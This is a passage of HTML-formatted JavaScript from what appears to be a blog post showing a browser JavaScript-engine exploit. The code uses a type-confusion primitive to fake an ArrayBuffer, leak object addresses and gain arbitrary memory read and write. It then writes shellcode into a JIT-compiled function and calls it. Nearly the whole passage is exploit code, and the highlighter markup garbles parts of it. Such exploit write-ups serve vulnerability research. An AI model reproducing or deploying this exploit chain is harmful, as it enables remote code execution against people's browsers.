class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x70<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-92\"><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x6<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_proto_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-93\"><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x7<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_proto_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-94\"><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_constructor_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-95\"><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x9<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_constructor_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-96\"><span class=\"crayon-v\">float_arr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-98\"><span class=\"crayon-e\">gc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-99\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj_float<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-100\"><span class=\"crayon-e\">change_to_float<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">ab_map_obj_float<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-101\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-102\"><span class=\"crayon-c\">\/******************************* step 2&nbsp;&nbsp;&nbsp;&nbsp;read fake_ab_map_ address&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-104\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">ab_map_obj_float<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-105\"><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x40<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-106\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-107\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_ab<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-108\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-109\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-110\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-111\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* buffer length *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-112\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x12345678<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x123<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-c\">\/* buffer address *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-113\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-114\"><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-115\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-116\"><span class=\"crayon-e\">change_to_float<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fake_ab<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-117\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-118\"><span class=\"crayon-c\">\/******************************* step 3&nbsp;&nbsp;&nbsp;&nbsp;read fake_ArrayBuffer_address&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-119\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-120\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-121\"><span class=\"crayon-v\">fake_ab_float_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x40<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-122\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-123\"><span class=\"crayon-c\">\/******************************* step 4 fake a ArrayBuffer&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-124\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-125\"><span class=\"crayon-v\">fake_ab_float_addr_f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fake_ab_float_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fake_ab_float_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-126\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-127\"><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;function e3(){&nbsp;&nbsp;evil3[1] = &#8216;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">fake_ab_float_addr_f<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;;}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-128\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x6000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-129\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">e3<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-130\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-131\"><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-132\"><span class=\"crayon-e\">e3<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-133\"><span class=\"crayon-v\">fake_arraybuffer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">evil3<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-134\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">fake_arraybuffer <\/span><span class=\"crayon-r\">instanceof<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ArrayBuffer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-135\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-136\"><span class=\"crayon-v\">fake_dv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">DataView<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fake_arraybuffer<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-137\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-138\"><span class=\"crayon-c\">\/******************************* step 5 Read a Function Address&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-139\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-140\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">func_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;eval(&#8221;);&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-141\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-142\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">function_to_shellcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;a&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">func_body<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-143\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-144\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">function_to_shellcode<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-145\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-146\"><span class=\"crayon-v\">shellcode_address_ref<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x38<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-147\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-148\"><span class=\"crayon-c\">\/**************************************&nbsp;&nbsp;And now,we get arbitrary memory read write!!!!!!&nbsp;&nbsp; ******************************************\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-149\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-150\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Read32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-151\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-152\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_dv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getUint32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-153\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-154\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Write32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-155\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-156\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-157\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fake_dv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setUint32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-158\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-159\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">shellcode_address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Read32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">shellcode_address_ref<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Read32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">shellcode_address_ref<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-160\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-161\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">shellcode_address<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-162\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-163\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/ 0x100000000,addr &amp; 0xffffffff);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-164\"><span class=\"crayon-c\">\tfor(var i = 0; i &lt; shellcode.length;i++){<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-165\"><span class=\"crayon-c\">\t\tvar value = shellcode[i];\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-166\"><span class=\"crayon-c\">\t\tfake_dv.setUint32(i * 4,value,true);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-167\"><span class=\"crayon-c\">\t}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-168\"><span class=\"crayon-c\">\talert(&#8220;boom&#8221;);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-169\"><span class=\"crayon-c\">\tfunction_to_shellcode();<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-170\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-171\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-172\"><span 